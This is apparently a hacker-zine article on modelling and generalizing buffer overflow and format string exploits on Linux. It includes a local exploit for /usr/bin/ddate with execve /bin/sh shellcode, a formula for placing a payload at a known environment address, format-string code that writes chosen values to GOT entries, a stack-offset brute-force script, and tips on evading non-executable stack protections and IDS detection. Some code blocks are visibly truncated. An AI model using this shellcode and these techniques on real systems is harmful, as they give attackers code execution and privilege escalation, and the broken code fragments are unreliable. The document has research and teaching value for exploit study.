--[ Exploit Modelling and Generalization --[ Introduction Exploit writing has been done for a long time, and much time and energy is consumed by those writing them. Most of the time exploits are variations on the same principles most of the time. Even if we accept this as 'truth', we see that pieces of code are written from scratch time and time again, and the same sort of calculations and techniques are performed most of the time. The impact of this has two sides, first of all lots of energy is wasted, since the writing could have cost the author much less time, the second is that most of the time the author seems happy with his achievements and is not planning to go and waste more energy implementing ease-of-use and more reliable use for something that's going to be fixed only few days after the vulnerability has been disclosed. This paper tries to generalize exploitation principles and also strives to build a non-formal exploitation model for use in buffer overflow and format string exploit building. --[ In the beginning there was... In order to try to generalize exploit principles it would come in handy to use a bottem-up approach, in other words, we will first try and find the most simple "axiom" on which to build and will build on that in order to tackle more complex cases. Obviously, the most easy case to be described is the easiest form in which a buffer overflow can occur, overflowing the buffer as far as user input is provided in a program that runs locally. This seems like a bit of a cliche to be talking about, but since we're working in a top down manner, I need to discuss it anyhow. When looking into these types of exploits the first stricking thing that clubbers a lot of exploit code is the way in which strings used to overflow with are generated - a lot of memcpy()s, loops and memset()s often make many exploits look annoyingly gibberish. This is not truly a problem, but it gets more nasty to keep track of what one is doing in situations where exploits grow bigger. So, first of all we'd like a general way in which to generate strings easily. This can either be done by using a programming language fit to creating a string easily (think of perl, the string and vector STL of C++ and so on), or writing a C function to do this by itself. The next striking thing is that the 'offset' and get_sp() principle is still used far to often. First of all one can be wondering why the get_sp() function was introduced - Linux uses virtual memory spaces, so what has the stack offset of the executing program got to do with the stack offset of the program that gets executed? The answer for this is pretty easy: there are 'objects' that travel from one virtual memory space to the other, the most obvious one being the environment of the program. Since the environment is located at the base of the stack, it can influence the place at which the payload is going to appear when it fluctuates in size (ie. some given exploit could work in an environment of size 10, but as soon as it swells to size 200 we're out of luck - to make up for this the offset was put in). The usefull part of this situation is that the environment starts out at a known fixed base. Knowing this it is easy to put in the payload to the exploit in an environment variable (traditionally called EGG), and use the injection vector to jump back there. This technique still suffers from fluctuations in the environment, depending on how many entries there are in front of it (ie. closer to the base). If we make sure that the payload is going to be the first entry in the environment, we can pinpoint it's exact location. Taking a look at /usr/src/linux/fs/exec.c gives us an insight in the do_execve() symbol. This function basically set the pointer "p" present in the linux_binprm structure to the end of the last memory page (this comes down to 0xc0000000 in normal circumstances) minus the size of a void pointer, copies the real filename of the file we execute to "p", and afdter that the environment and the program arguments. This means that we can calculate the exact position of a given environment variable that contains our payload doing: 0xc0000000-sizeof(void *)-sizeof(TARGET_FILENAME)-sizeof(shellcode) Obviously, we shall have to make sure that the shellcode is going to be the first environment variable, the easiest way to do this is crafting the environment of the target program by yourself. Combining all this we could write the most simple form of a local buffer overflow as follows: #include #define FILENAME "/usr/bin/ddate" char code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c" "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb" "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; main() { char *blah=NULL; char *env[2]= {NULL, NULL}; strcreat(&blah, "+", 1); strcreat(&blah, addytostr(0xc0000000-4-sizeof(FILENAME)-sizeof(code)), 1000); strcreat(&env[0], code, 1); execle(FILENAME, "ddate", blah, NULL, env); } strcreat() being a virtual function which appends the first argument times the second argument dynamically to the character array argument. This is much less complicated than most exploits out there, and keeps focussed on what is really going on, while not being clobbered by obfuscated C. The idea of being able to exactly put up some given bytes in memory comes in truly handy in many different situations. Especially when putting up "evil" structures, ranging from local stack frames, FILE structures to memory chunks knowledge of where the evil structure is going to be is the key element to successfull exploitation. --[ Format bugs A bit harder to model than it's ancient god-father, the overflow, but certainly more interesting. The general concept of a format bug is rather simple, we can provide a stream of addresses somewhere in memory space, reach this stream with our format by either walking the stack or selecting the appropriate element directly and finally write to this address using %n, which we have incremented to the value we wanted to write to the address. The problem with %n is that older libc versions cannot cope with any way to get a significantly large value in it (ie. 0xbffffe90 won't work). In order to avoid this problem, we use it's smaller counter part, %hn, which writes back a 16 bit word instead of a 32 bit dword, thus making only incrementations up to 65536 necessary, which any version of libc survives. The first thing we have to know is that we can only increment the value held in %hn during the processing of the format string. Because of this we can only write back values equal to %hn or bigger than %hn at a given point in time. Since we put in the address stream used by the format string, we control the sequence in which the addresses get written to. This makes it possible to make sure that addresses containing the smallest %hn values get written to first, and the bigger addresses later in time. We create an association between every address and word value we write to it, and build a list of these associations. We sort this list by value using our favourite sorting algorithm. After we did this we have found the correct order in which to write out the values still associated correctly with the addresses. We now take a look at how to use this idea in both of the cases which we used to find the addresses we provided in memory. When using stack walking by providing a format to get to the addresses to write back to we get into a bit of a problem, since %hn will end up with a certain value after this 'walk'. This is the reason that I recommend people using stack walking to walk using a format that makes %hn contain a value that can be determined, and not one that depends on what the stack contains at that time. Ie. using %.8x to stack walk will function properly, but using %d to do so might get you into trouble, since every zero dword on the stack will increment %hn by only one, while every fully used dword will increment %hn by a larger value. We now we're only going to be able to create a format string to write the association list the way we wanted to to memory if the initial %hn value determined by how far we have to stack-walk to get to the addresses is smaller or equal to the top value in the sorted list. If not, we're out of luck, it might be possible to model scenario's using overlapped writes, but I haven't looked into that yet. The second method to get to our addresses on stack is certainly more usefull. We can use a %$ notation to specify the stack element argument number to use for the following format specifier. In other words, %100$.8x prints out the 100th element on the stack. In this way, we can select stack elemens and thus reach our address stream without incrementing %hn in any way. Thus, we can write back values ranging from 0x0000 to 0xffff to the provided addresses. Using the second form of the model gets truly scary, we're able to write back any value to any memory address that doesn't contain a NULL byte using it. An idea for the use might be chopping up the payload to the exploit in word pieces, using the given routines, and poke it to memory using the format bug itself. When modelled in this way a format bug will always be able to evade a non-executable stack patch (provided we can get the format big enough), and is ranged to a nice character set (0x24, 0x25, 0x30 - 0x39, 0x64, 0x6e). This in turn will evade any IDS that looks for shellcode+nops. Obviously, we don't need nops any more, since we are the ones that specify where the payload is going to end up in the first place. A piece of sample code might be: association *assoc=NULL; unsigned long GOTent=0x0804bf01; /* Some global offset table entry */ unsigned long payload_addy=0x08043201; /* Our payload address */ associate(&assoc, (unsigned char *)GOTent, payload_addy & 0xffff); associate(&assoc, (unsigned char *)GOTent+2, (payload_addy >> 16) & 0xffff); for(i=0;i #include "fmtgen.h" #define FILENAME "./a.out" main(int argc, char **argv) { char *env[2]= {NULL, NULL}; association *assoc=NULL; associate(&assoc, 0xbffffefa, 0xff41); associate(&assoc, 0xbffffefc, 0xff42); associate(&assoc, 0xbffffefe, 0xff43); associate(&assoc, 0xbfffff41, 0xff44); /* 41: Dummy address */ associate(&assoc, 0xbfffffec, 0xff00); /* Modify address stream here! */ quicksort(assoc); env[0] = makeAddresses2(assoc, 3, A_POST); execle("./a.out", "./a.out", makeEvilFmt2(assoc, atoi(argv[1])), NULL, env); } Our goal is to write the value 0xff45 to address 0xbfffff00. The dummy association address 0xbfffff41 will be modified on the fly to contain 0xbfffff00 in the end. In order to find the correct stack element to start at, a quick little brute forcer was needed. It simply checked if a given stack element produced a core dump or not. brute.sh -------- #!/bin/sh # If no coredump gets produced, mark the stack element number... for i in `seq 1 100` ; do ./exp $i if [ -e ./core ]; then rm ./core else touch $i fi done On my machine, this yielded 81 in the filesystem as a result. After running it, I got the following (incorrect) result: At 0xbfffff00: ffdc Somewhere there seemed to be a flaw in all this logic, and after fetching a good cup of coffee I set out to look where it could be. After 5 more minutes of fidgetting, I came to the conclusion that the number argument given to %d would be a minimum field width specifier, but not a maximum one. Thus when printing a value of 123 using %1d it seemed that %hn still would increment by 3 instead of 1. I had to build in increments of only one byte using %c when the incrementation would be done below a certain threshold value (ascii lenght of ULONG_MAX). The shellcode words were too far apart to be affected by this problem. More to come. -- Scrippie/ronald@grafix.nl